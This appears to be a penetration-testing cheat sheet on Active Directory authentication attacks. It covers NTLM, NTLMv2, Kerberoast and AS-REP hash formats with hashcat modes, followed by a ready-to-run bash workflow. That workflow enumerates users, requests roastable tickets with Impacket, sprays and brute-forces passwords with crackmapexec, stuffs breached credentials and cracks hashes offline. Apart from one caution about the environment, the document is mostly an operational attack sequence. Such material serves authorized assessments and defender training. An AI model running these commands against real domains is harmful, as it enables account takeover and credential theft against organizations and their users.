Authentication Attacks
Important: Understand the environment before launching any attacks; bringing down a critical service could cause major issues for the organization (and for you). 😅
Hash Types in Active Directory Environments
Hash Type Reference Table
| Hash Type | Hashcat Mode | Example Format | Obtained Via | Use |
| --- | --- | --- | --- | --- |
| NTLM | 1000 | `31d6cfe0d16ae931b73c59d7e0c089c0` | secretsdump, SAM/NTDS | Pass-the-hash, local authentication |
| NTLMv2 | 5600 | `user::domain:challenge:response:blob` | Network capture, Responder | Challenge-response auth, credential theft |
| Kerberos TGS | 13100 | `$krb5tgs$23$*user$DOMAIN$service*$hash` | Kerberoasting attacks | Service account password recovery |
| AS-REP | 18200 | `$krb5asrep$23$user@DOMAIN:hash` | AS-REP roasting | User accounts without pre-auth |
NTLM Hash (Mode 1000)
Purpose: Legacy Windows password hash stored in SAM database and NTDS.dit
Structure: MD4 hash of the Unicode password (32 hexadecimal characters)
Weakness: Fast to crack due to weak hashing algorithm, no salt
Attack Value: Enables pass-the-hash attacks without knowing plaintext password
NTLMv2 Hash (Mode 5600)
Purpose: Challenge-response authentication hash for network protocols
Structure: HMAC-MD5 of username, domain, server challenge, and client response
Weakness: Can be captured through LLMNR/NBT-NS poisoning or man-in-the-middle attacks
Attack Value: Provides cleartext password when cracked, works across network authentication
Kerberos TGS Hash (Mode 13100)
Purpose: Service ticket encrypted with service account password
Structure: Kerberos ticket encrypted using RC4-HMAC or AES encryption
Weakness: Service accounts often have weak passwords and don't change frequently
Attack Value: Service accounts typically have elevated privileges for applications/databases
AS-REP Hash (Mode 18200)
Purpose: Authentication Server response for accounts without Kerberos pre-authentication
Structure: Encrypted timestamp using user's password hash
Weakness: Accounts configured with "Do not require Kerberos pre-authentication"
Attack Value: Direct user account compromise, often legacy compatibility setting
Integrated Attack Workflow
Comprehensive Authentication Assessment
```bash
# Step 1: Reconnaissance
# --pass-pol shows the lockout threshold and window; size the spraying in step 3 to stay under it
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
# --users prints a formatted table; reduce it to bare usernames before reusing the file below
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users > users.txt
# Step 2: Service Account Targeting
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile kerberoast.txt
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile asrep.txt
# Step 3: Password Spraying
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success
# Step 4: Credential Stuffing (if breach data available)
crackmapexec smb <DC-IP> -u breach_users.txt -p breach_passwords.txt --no-bruteforce --continue-on-success
# Step 5: Targeted Brute Force
crackmapexec smb <DC-IP> -u 'administrator' -p admin_passwords.txt --continue-on-success
# Step 6: Offline Cracking
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
```